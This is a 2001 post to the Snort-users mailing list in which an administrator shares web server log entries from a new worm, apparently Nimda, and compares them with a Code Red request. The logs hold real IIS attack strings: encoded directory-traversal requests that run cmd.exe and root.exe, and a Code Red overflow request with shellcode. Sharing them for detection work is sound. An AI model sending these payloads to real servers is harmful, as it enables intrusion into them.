[Snort-users] Code Green???

Ed Kasky ed at ...3483...
Tue Sep 18 08:53:10 EDT 2001


Mine started at about 6:00 am PDT this morning.  I checked my access log as 
well and these are very different from the code red attacks:

216.112.222.12 - - [18/Sep/2001:06:26:11 -0700] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 328

216.112.222.12 - - [18/Sep/2001:06:26:12 -0700] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 326

216.112.222.12 - - [18/Sep/2001:06:26:13 -0700] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336

216.112.222.12 - - [18/Sep/2001:06:26:14 -0700] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336

216.112.222.12 - - [18/Sep/2001:06:26:16 -0700] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350

216.112.222.12 - - [18/Sep/2001:06:26:17 -0700] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 367

216.112.222.12 - - [18/Sep/2001:06:26:18 -0700] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 367

216.112.222.12 - - [18/Sep/2001:06:26:19 -0700] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 383

216.112.222.12 - - [18/Sep/2001:06:26:23 -0700] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

216.112.222.12 - - [18/Sep/2001:06:26:25 -0700] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

216.112.222.12 - - [18/Sep/2001:06:26:29 -0700] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

216.112.222.12 - - [18/Sep/2001:06:26:30 -0700] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

A code red looks like this:

149.225.56.209 - - [18/Sep/2001:03:34:28 -0700] "GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
HTTP/1.0" 500 648


At 10:16 AM 9/18/2001 -0500, Steve Halligan wrote:
>I am getting loads of this too.  I just set up a honeypot to catch it.





More information about the Snort-users mailing list